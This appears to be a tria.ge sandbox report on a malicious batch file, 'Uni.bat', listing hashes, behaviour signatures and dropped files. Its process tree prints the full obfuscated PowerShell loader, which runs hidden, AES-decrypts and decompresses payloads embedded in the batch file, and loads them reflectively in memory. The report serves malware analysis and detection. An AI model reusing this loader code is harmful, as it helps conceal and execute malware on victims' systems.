Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
164s -
max time network
176s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
-
submitted
13/10/2023, 02:41
General
-
Target
Uni.bat
-
Size
14.6MB
-
MD5
5e162353f6d4f0d3316785c49590cf47
-
SHA1
a14a7c2639715020df5a2d84ad21236be8674cb5
-
SHA256
c5162d43e1479ede6cff08c3aeadb08187475e85315128cdac2d32ffe681c813
-
SHA512
323f840bf950b4f7a7feec7cd73979018ac2cdf2554e7855a22aca9ef1471eec282d6b56c66136228c8969ee3d0ea195abd587efb3b2746fd35adba1bd0bd5c0
-
SSDEEP
49152:9aok+ydtT1GNd9t6Qeuu+ZgswnNebCyy14BWxpW25Evp/flH1v4r0KKj5dci0RGs:a
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Drops file in System32 directory 6 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 6 IoCs
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{88c9a04d-ec39-45d7-b709-a56d4969e43c}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function WuBcS($EFabz){ $bRzHB=[System.Security.Cryptography.Aes]::Create(); $bRzHB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $bRzHB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $bRzHB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AVCsDfD9ktxxy7ap9R1lOS4/eLdwd4Kk6x4IJe7TpyY='); $bRzHB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cRWQ+MYrSp19UY3Rby7uBA=='); $IDZdQ=$bRzHB.CreateDecryptor(); $return_var=$IDZdQ.TransformFinalBlock($EFabz, 0, $EFabz.Length); $IDZdQ.Dispose(); $bRzHB.Dispose(); $return_var;}function cNbkK($EFabz){ $KexDo=New-Object System.IO.MemoryStream(,$EFabz); $TmKio=New-Object System.IO.MemoryStream; $eYdxw=New-Object System.IO.Compression.GZipStream($KexDo, [IO.Compression.CompressionMode]::Decompress); $eYdxw.CopyTo($TmKio); $eYdxw.Dispose(); $KexDo.Dispose(); $TmKio.Dispose(); $TmKio.ToArray();}function JmoQC($EFabz,$CWcpU){ $RZrLm=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$EFabz); $nyWoi=$RZrLm.EntryPoint; $nyWoi.Invoke($null, $CWcpU);}$veHDh=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($PmkNr in $veHDh) { if ($PmkNr.StartsWith('SEROXEN')) { $fVggE=$PmkNr.Substring(7); break; }}$lhiuJ=[string[]]$fVggE.Split('\');$omIJM=cNbkK (WuBcS ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lhiuJ[0])));$iWNDL=cNbkK (WuBcS ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lhiuJ[1])));JmoQC $iWNDL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));JmoQC $omIJM (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{c807ffc8-cf17-4cf8-8b06-49313ddc302f}3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
2.0MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
144KB
-
Filesize
64KB
-
Filesize
760KB
-
Filesize
12.1MB
-
Filesize
64KB
-
Filesize
100KB
-
Filesize
1.7MB
-
Filesize
1.4MB
-
Filesize
352KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
136KB
-
Filesize
16KB
-
Filesize
16KB
-
Filesize
24KB
-
Filesize
24KB